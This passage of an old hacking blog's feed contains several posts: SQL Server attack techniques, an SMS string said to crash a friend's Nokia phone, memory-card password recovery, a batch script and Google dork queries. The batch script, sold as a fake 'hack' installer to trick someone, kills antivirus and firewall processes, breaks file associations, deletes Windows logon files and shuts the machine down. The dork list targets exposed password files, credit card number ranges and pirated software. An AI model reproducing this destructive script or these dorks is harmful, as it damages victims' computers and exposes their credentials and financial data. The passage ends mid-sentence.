  70. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/1582822386162701170/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=1582822386162701170' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/1582822386162701170'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/1582822386162701170'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/netbios-hacking_29.html' title='NetBios Hacking'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-4096982641081041369</id><published>2008-11-29T00:04:00.000-08:00</published><updated>2008-11-29T00:05:25.378-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Exploit SQL Server System"/><title type='text'>Exploit SQL Server System</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.&lt;/p&gt; &lt;p&gt;1. Direct connections via the Internet&lt;/p&gt; &lt;p&gt;These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield’s Port Report shows just how many systems are sitting out there waiting to be attacked. I don’t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.&lt;/p&gt; &lt;p&gt;2. Vulnerability scanning&lt;/p&gt; &lt;p&gt;Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.’s NGSSquirrel for SQL Server (for database-specific scanning). They’re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.&lt;/p&gt; &lt;p&gt;&lt;img src=&quot;http://tk.files.storage.msn.com/x1pCFuELfk4HG5HGNGsDSLDPIZGci4keyi-BhYVByksyZbqcTavuOV0F7Y02_RM7S4Pq-PM7LaB_TadnSRkTOXdSpt1fYMTeSmT8pOaKhsuMqM4KnIuS8yX2RZZyh_wt1KLcThkvV0_xE0&quot; alt=&quot;sql hacker fig1&quot; /&gt;&lt;/p&gt; &lt;p&gt;Figure 1: Common SQL injection vulnerabilities found using WebInspect.&lt;/p&gt; &lt;p&gt;3. Enumerating the SQL Server Resolution Service&lt;/p&gt; &lt;p&gt;Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews’ SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren’t listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.&lt;/p&gt; &lt;p&gt;4. Cracking SA passwords&lt;/p&gt; &lt;p&gt;Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.&lt;/p&gt; &lt;p&gt;5. Direct-exploit attacks&lt;/p&gt; &lt;p&gt;Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.&lt;/p&gt; &lt;p&gt;&lt;img src=&quot;http://tk.files.storage.msn.com/x1pCFuELfk4HG5HGNGsDSLDPGwHBJTb0vp0sXjpOrOZrnH6nMP2G0SNPVQ4Y-rLvRXqUmjEXP1IzpJmFF1E77NsFhuHZFjUzCxCo6xPpAM6Qa3C3-Up5TNdn8NpdoxJZm5u9SqpHqmLyIU&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;/p&gt; &lt;p&gt;Figure 2: SQL Server vulnerability exploitable using Metasploit’s MSFConsole.&lt;/p&gt; &lt;p&gt;6. SQL injection&lt;/p&gt; &lt;p&gt;SQL injection attacks are executed via front-end Web applications that don’t properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually — if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics’ SQL Injector, shown in Figure 3.&lt;br /&gt;&lt;img src=&quot;http://tk.files.storage.msn.com/x1pCFuELfk4HG5HGNGsDSLDPKB85nrgDPBZgZMzpdS4LYDPlYY7ipEXc5tc_g81kn8mmksZeBbk9NCCohx3sWeSBAZIs0REpIUFqwgOVzeTDwq0JdaKV_ldDqJDnXdk_NBgH7UIhhw_QEk&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;br /&gt;Figure 3: SPI Dynamics’ SQL Injector tool automates the SQL injection process.&lt;/p&gt; &lt;p&gt;7. Blind SQL injection&lt;/p&gt; &lt;p&gt;These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn’t receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that’s where Absinthe, shown in Figure 4, comes in handy.&lt;/p&gt; &lt;p&gt;&lt;img src=&quot;http://tk.files.storage.msn.com/x1pCFuELfk4HG5HGNGsDSLDPFOs_13CAeDL85BfAUQPDED10kx1dXmFdlTmyK-RbdrqfNqYWfqiYbcsgjT0hEDVQhWO6-K-jtbolzY-3K_VYu5PbS3FInnp-RAs9vZ-MOiG7E-NnBR48FY&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;br /&gt;Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.&lt;/p&gt; &lt;div id=&quot;wikiContent&quot;&gt; &lt;p&gt;8. Reverse engineering the system&lt;/p&gt; &lt;p&gt;The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you’ll find a discussion about reverse engineering ploys.&lt;/p&gt; &lt;p&gt;9. Google hacks&lt;/p&gt; &lt;p&gt;Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors — such as “Incorrect syntax near” — leaking from publicly accessible systems. Several Google queries are available at Johnny Long’s Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google’s ’site:’ operator often turns up juicy info you never imagined you could unearth.&lt;/p&gt; &lt;p&gt;10. Perusing Web site source code&lt;/p&gt; &lt;p&gt;Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.&lt;/p&gt;&lt;/div&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  71. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  72. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  73. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  74. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/4096982641081041369/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=4096982641081041369' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/4096982641081041369'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/4096982641081041369'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/exploit-sql-server-system_29.html' title='Exploit SQL Server System'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-5278333597748408650</id><published>2008-11-29T00:03:00.000-08:00</published><updated>2008-11-29T00:04:21.853-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Restart your friend’s phone using sms"/><title type='text'>Restart your friend’s phone using sms</title><content type='html'>&lt;p&gt;Here is a new trick to restart ur friends mobile via sms&lt;/p&gt; &lt;p&gt;with this trick only 1110,1110i,1112,1100,2100 can be restarted.&lt;/p&gt; &lt;div&gt;just type &lt;p&gt;,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&lt;/p&gt; &lt;p&gt;,,&lt;br /&gt;,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&lt;br /&gt;,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&lt;/p&gt; &lt;p&gt;or 79 inverted commas&lt;/p&gt; &lt;p&gt;in text msg and send it to ur friend having cells mention above and see wat happens.&lt;/p&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  75. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  76. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  77. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  78. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/5278333597748408650/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=5278333597748408650' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/5278333597748408650'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/5278333597748408650'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/restart-your-friends-phone-using-sms_29.html' title='Restart your friend’s phone using sms'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-800843196132416080</id><published>2008-11-29T00:02:00.000-08:00</published><updated>2008-11-29T00:03:32.536-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="How to Unlock Password Protected Memory Cards"/><title type='text'>How to Unlock Password Protected Memory Cards</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;Well its quite simple but most of the people do not know it.&lt;/p&gt; &lt;p&gt;Please note the fact that it only works if the password to the MMC Card was set in ur own mobile,where u want it to be unlocked.&lt;/p&gt; &lt;p&gt;This method works well for nokia cells with symbian operating system.Never tried on other cells.use any software like FXplorer that can browse files in ur cell.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; Open one of above software you have.&lt;br /&gt;&lt;strong&gt;2.&lt;/strong&gt; Browse through the directory, C:\system&lt;br /&gt;&lt;strong&gt;3.&lt;/strong&gt; Rename the file mmcstore to mmcstore.txt&lt;br /&gt;&lt;strong&gt;4.&lt;/strong&gt; Open the file - The file will open in Notes.&lt;br /&gt;&lt;strong&gt;5.&lt;/strong&gt; You will find your password in that file. That file would also contain much more data which you do not understand,so you need to go through the file to get the password!&lt;/p&gt; &lt;p&gt;When ur cell is connected to pc by means of data cable or bluetooth,u can see the password by simply opening the file mmcstore with notepad.&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  79. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  80. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  81. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  82. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/800843196132416080/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=800843196132416080' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/800843196132416080'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/800843196132416080'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/how-to-unlock-password-protected-memory_29.html' title='How to Unlock Password Protected Memory Cards'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-1464215363627352625</id><published>2008-11-29T00:01:00.000-08:00</published><updated>2008-11-29T00:02:31.544-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Fool Someone Into Thinking That He Is Installing a Hack"/><title type='text'>Fool Someone Into Thinking That He Is Installing a Hack</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!&lt;/p&gt; &lt;p&gt;This Hack will:&lt;/p&gt; &lt;p&gt;1. End Process, NAVAPSVC.exe&lt;br /&gt;2. End Process, Explorer.exe (taskbar and icons will dissapear)&lt;br /&gt;3. End Process, zonelabs.exe&lt;br /&gt;4. associate a exe file with txt (when opening exe files, it will go to notepad)&lt;br /&gt;5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)&lt;br /&gt;6. Deletes Login/Logoff Screens&lt;/p&gt; &lt;p&gt;************************************************************************************&lt;/p&gt; &lt;p&gt;title Hack Setup&lt;br /&gt;color 0A&lt;br /&gt;@echo off&lt;br /&gt;set end=md “Hack installing”&lt;br /&gt;set fin=copy “Hack log.txt” “Installing”&lt;br /&gt;%end%&lt;br /&gt;%fin%&lt;br /&gt;net send * Hack is installing, press OK to begin set up.&lt;br /&gt;kill NAVAPSVC.exe /F /Q&lt;br /&gt;kill zonelabs.exe /F /Q&lt;br /&gt;kill explorer.exe /F /Q&lt;br /&gt;cls&lt;br /&gt;assoc .exe=txtfile&lt;br /&gt;assoc .txt=mp3file&lt;br /&gt;cls&lt;br /&gt;msg * It is you who is hacked….&lt;br /&gt;msg * I warned you, and you kept going. Challenge me and this is what happens.&lt;br /&gt;DEL C:\WINDOWS\system32\logoff.exe /F /Q&lt;br /&gt;DEL C:\WINDOWS\system32\logon.exe /F /Q&lt;br /&gt;DEL C:\WINDOWS\system32\logon.scr /F /Q&lt;br /&gt;cls&lt;br /&gt;shutdown&lt;/p&gt; &lt;p&gt;**************************************************************&lt;/p&gt; &lt;p&gt;Please Do NOT Try This Yourself!&lt;/p&gt; &lt;p&gt;I will NOT Be Held Responsible for this!&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  83. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  84. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  85. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  86. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/1464215363627352625/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=1464215363627352625' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/1464215363627352625'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/1464215363627352625'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/fool-someone-into-thinking-that-he-is_29.html' title='Fool Someone Into Thinking That He Is Installing a Hack'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-7448905499668976755</id><published>2008-11-25T10:42:00.000-08:00</published><updated>2008-11-25T10:43:33.345-08:00</updated><title type='text'>Google Hacking</title><content type='html'>&lt;span style=&quot;font-size:100%;&quot;&gt;Using Google, and some finely crafted searches we can find a lot of interesting information.&lt;br /&gt;&lt;br /&gt;For Example we can find:&lt;br /&gt;Credit Card Numbers&lt;br /&gt;Passwords&lt;br /&gt;Software / MP3&#39;s&lt;br /&gt;...... (and on and on and on)&lt;/span&gt;  &lt;span style=&quot;font-size:100%;&quot;&gt;Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in. &lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;br /&gt;&lt;br /&gt;Try a few of these searches:&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class=&quot;pn-normal&quot;  style=&quot;font-size:100%;&quot;&gt;intitle:&quot;Index of&quot; passwords modified&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;allinurl:auth_user_file.txt&lt;br /&gt;&quot;access denied for user&quot; &quot;using password&quot;&lt;br /&gt;&quot;A syntax error has occurred&quot; filetype:ihtml&lt;br /&gt;allinurl: admin mdb&lt;br /&gt;&quot;ORA-00921: unexpected end of SQL command&quot;&lt;br /&gt;inurl:passlist.txt&lt;br /&gt;&quot;Index of /backup&quot;&lt;br /&gt;&quot;Chatologica MetaSearch&quot; &quot;stack tracking:&quot;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;Amex Numbers: 300000000000000..399999999999999&lt;br /&gt;MC Numbers: 5178000000000000..5178999999999999&lt;br /&gt;&lt;a href=&quot;http://www.google.com/search?q=visa+4356000000000000..4356999999999999&amp;amp;sourceid=firefox&amp;amp;start=0&amp;amp;start=0&amp;amp;ie=utf-8&amp;amp;oe=utf-8&quot;&gt;visa 4356000000000000..4356999999999999&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&quot;parent directory &quot; /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&quot;parent directory &quot; DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&quot;parent directory &quot;Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&quot;parent directory &quot; Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&quot;parent directory &quot; MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&quot;parent directory &quot; Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;strong&gt;&lt;span class=&quot;caps&quot;&gt;METHOD 2&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;put this string in google search:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=Example%3A+%3Fintitle%3Aindex.of%3F+mp3+jackson&quot;&gt;?intitle:index.of? mp3&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;You only need add the name of the song/artist/singer.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;Example: ?intitle:index.of? mp3 jackson&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;strong&gt;&lt;span class=&quot;caps&quot;&gt;METHOD 3&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;put this string in google search:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=inurl%3Amicrosoft+filetype%3Aiso&quot;&gt;inurl:microsoft filetype:iso&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=%22%23+-FrontPage-%22+inurl%3Aservice.pwd&quot;&gt;&quot;# -FrontPage-&quot; inurl:service.pwd&lt;/a&gt;&lt;br /&gt;Frontpage passwords.. very nice clean search results listing !!&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=%22AutoCreate%3DTRUE+password%3D*%22+&quot;&gt;&quot;AutoCreate=TRUE password=*&quot; &lt;/a&gt;&lt;br /&gt;This searches the password for &quot;Website Access Analyzer&quot;, a Japanese software that creates webstatistics. For those who can read Japanese, check out the author&#39;s site at: http://www.coara.or.jp/~passy/&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=%22http%3A%2F%2F*%3A*@www%22+domainname&quot;&gt;&quot;http://*:*@www&quot; domainname&lt;/a&gt;&lt;br /&gt;This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=%22http%3A%2F%2F*%3A*@www%22+bangbus&quot;&gt;&quot;http://*:*@www&quot; bangbus&lt;/a&gt; or &lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=%22http%3A%2F%2F*%3A*@www%22bangbus&quot;&gt;&quot;http://*:*@www&quot;bangbus&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Another way is by just typing&lt;br /&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=%22http%3A%2F%2Fbob%3Abob@www%22&quot;&gt;&quot;http://bob:bob@www&quot;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=%22sets+mode%3A+%2Bk%22&quot;&gt;&quot;sets mode: +k&quot;&lt;/a&gt;&lt;br /&gt;This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.&lt;br /&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=allinurl%3A+admin+mdb&quot;&gt;&lt;br /&gt;allinurl: admin mdb&lt;/a&gt;&lt;br /&gt;Not all of these pages are administrator&#39;s access databases containing usernames, passwords and other sensitive information, but many are!&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;lr=&amp;amp;ie=UTF-8&amp;amp;c2coff=1&amp;amp;q=allinurl%3Aauth_user_file.txt&quot;&gt;allinurl:auth_user_file.txt&lt;/a&gt;&lt;br /&gt;DCForum&#39;s password file. This file gives a list of (crackable) passwords, usernames and email addresses for 